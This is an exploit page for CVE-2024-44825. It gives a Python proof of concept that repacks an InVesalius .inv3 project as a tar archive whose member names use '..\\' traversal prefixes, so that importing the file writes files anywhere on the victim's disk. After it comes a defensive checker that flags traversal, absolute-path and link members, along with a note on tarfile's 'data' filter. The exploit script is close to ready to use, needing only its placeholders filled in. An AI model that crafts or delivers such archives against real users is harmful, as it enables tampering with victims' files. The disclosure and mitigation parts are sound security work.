Invesalius 3.1 Arbitrary File Write / Directory Traversal
Proof-of-concept Python 3 code that builds a malicious payload to exploit an arbitrary file write via directory traversal in InVesalius version 3.1. The exploitation relies on a specially crafted .inv3 file (a custom InVesalius extension) which is in fact a tar archive; once it is imported into the victim's client application, it allows an attacker to write files and folders to disk.
```python
# Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal
# Discovered By: Riccardo Degli Esposti (partywave)
# Exploit Author: Riccardo Degli Esposti (partywave)
# Vendor Homepage: https://invesalius.github.io/
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius
# Version: from 3.1.99995
# Tested on: Windows
# CVE-ID: CVE-2024-44825

import tarfile
import os
import zipfile

# Disclaimer:
# Tested on Windows
# edit every [CHANGEME] before running this script

# Step 0: Setup local paths
# Adapt your paths
zip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'
extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'
output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'
main_plist_path = os.path.join(extracted_folder, 'main.plist')

# Ensure the extraction directory exists
os.makedirs(extracted_folder, exist_ok=True)

# Step 1: Extract the ZIP file
with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:
    zip_ref.extractall(extracted_folder)

# Step 2: Modify main.plist
with open(main_plist_path, 'r') as file:
    main_plist_content = file.read()

# POC of loading new XML
main_plist_content = main_plist_content.replace(
    '<string>ProMED CT 0051</string>',
    '<string>This is a confirmation modifying the XML</string>')

with open(main_plist_path, 'w') as file:
    file.write(main_plist_content)

# Step 3: Create the tar archive
# Adapt where you want to write
def rename(tarinfo):
    tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name
    return tarinfo

with tarfile.open(output_tar, "w:xz") as tar:
    for root, _, files in os.walk(extracted_folder):
        for file in files:
            full_path = os.path.join(root, file)
            arcname = os.path.relpath(full_path, extracted_folder)
            tar.add(full_path, arcname=arcname, filter=rename)

print(output_tar)
```
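As an added defensive check, not part of the original PoC nor of InVesalius's own code, the following Python inspects the member names of an .inv3 (tar) archive before anything is extracted and reports entries that would escape the destination directory, including the backslash-separated `..` names the PoC produces, absolute paths, drive-letter paths and links. The destination path and the sample archive are constructed for illustration.

```python
import io
import os
import tarfile
from typing import List


def is_safe_member(name: str, dest: str) -> bool:
    """Return True only if extracting `name` under `dest` stays inside `dest`."""
    # tarfile keeps backslashes verbatim, but Windows treats them as separators,
    # so normalise before resolving; "..\\..\\x" must be judged as "../../x".
    normalised = name.replace("\\", "/")
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return False  # absolute POSIX path, UNC path, or Windows drive letter
    dest_abs = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_abs, *normalised.split("/")))
    return os.path.commonpath([dest_abs, target]) == dest_abs


def unsafe_members(archive_bytes: bytes, dest: str) -> List[str]:
    """List the names in a .inv3 archive that must not be extracted under `dest`."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            # Symlinks and hardlinks can redirect later writes outside dest too.
            if member.issym() or member.islnk():
                bad.append(member.name)
            elif not is_safe_member(member.name, dest):
                bad.append(member.name)
    return bad


def build_sample_archive() -> bytes:
    """Constructed xz-compressed tar with one benign and one traversal member."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:xz") as tar:
        for name in ("main.plist", "..\\..\\escape\\evil.txt"):
            data = b"<plist/>"
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed destination; only names are checked, nothing is written.
    print(unsafe_members(build_sample_archive(), "/tmp/inv_out"))
```

On Python 3.12 and later (and the security backports to 3.8.17, 3.9.17, 3.10.12 and 3.11.4), `tarfile.extractall(..., filter="data")` rejects the same classes of member, so an importer can combine this pre-check with that filter rather than relying on the default unfiltered extraction.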